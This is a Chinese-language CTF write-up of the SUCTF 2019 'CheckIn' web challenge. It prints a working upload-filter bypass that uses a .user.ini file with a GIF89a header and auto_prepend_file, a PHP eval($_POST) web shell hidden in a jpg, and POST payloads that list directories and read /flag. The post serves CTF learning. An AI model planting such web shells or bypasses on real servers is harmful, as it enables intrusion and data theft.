美文网首页
SUCTF 2019-WEB-CheckIn

SUCTF 2019-WEB-CheckIn

作者: le3f | 来源:发表于2020-04-06 21:16 被阅读0次

复现地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn

考察点: .user.ini 文件绕过
exif_imagetype() 文件头校验

解题

  1. 构造.user.ini文件
GIF89a                  
auto_prepend_file=l3ef.jpg
  1. 构造jpg文件
<script language="php">eval($_POST['l3ef']);phpinfo();</script>

制作图片马

copy background.jpg/a + l3ef.php/b l3ef.jpg
  1. 分别上传文件,显示上传路径


    image.png
  2. 访问index.php,默认会访问.user.ini中的文件


    image.png
  3. 读取文件目录

l3ef=var_dump(scandir("/"));
image.png

读取文件

l3ef=var_dump(file_get_contents("/flag"));
image.png

相关文章

  • SUCTF 2019-WEB-CheckIn

    复现地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 考察...

  • [SUCTF] SUCTF web题目 writeup

    SUCTF 这周末打了suctf,协会的大佬们都去参加tctf了,都没人打pwn了,不过最终成绩还可以不过恭喜协会...

  • python urllib.parse.urlunsplit()

    题目地址 https://buuoj.cn/challenges#[SUCTF%202019]Pythonginx...

  • SUCTF 2019-WEB-EasySQL

    复现地址https://buuoj.cn/challenges#[SUCTF%202019]EasySQL 考察点...

  • buuoj部分wp

    Web 1.[SUCTF]EasySQL 预期解 后台的查询语句可能为select $_POST['a'] || ...

  • SUCTF 2019 PWN

    0x01 sudrv qemu: 开启了kalsr和smep保护init: 内核会加载驱动sudrv.ko,且pr...

  • [SUCTF 2019]CheckIn

    先讲操作 首先,构造一个.user.ini文件,内容如下: 然后构造一个a.jpg,内容如下: 然后将两个文件分别...

  • SUCTF 2019 WriteUp

    Web Misc 签到题 给了一串编码,制作: 打开网页就可以得到flag。 game 查看源代码得到: 在/js...

  • [SUCTF 2019]CheckIn

    [SUCTF 2019]CheckIn 首页是个上传页面,尝试上传一个shell,发现回显非法后缀。删除后缀再上传...

  • SUCTF复盘

    当时没好好打,现在把环境复现一下对着wp撸一发。 WEB annonymous 这题原思路是HITCON2017的...

网友评论

      本文标题:SUCTF 2019-WEB-CheckIn

      本文链接:https://www.haomeiwen.com/subject/ttyiphtx.html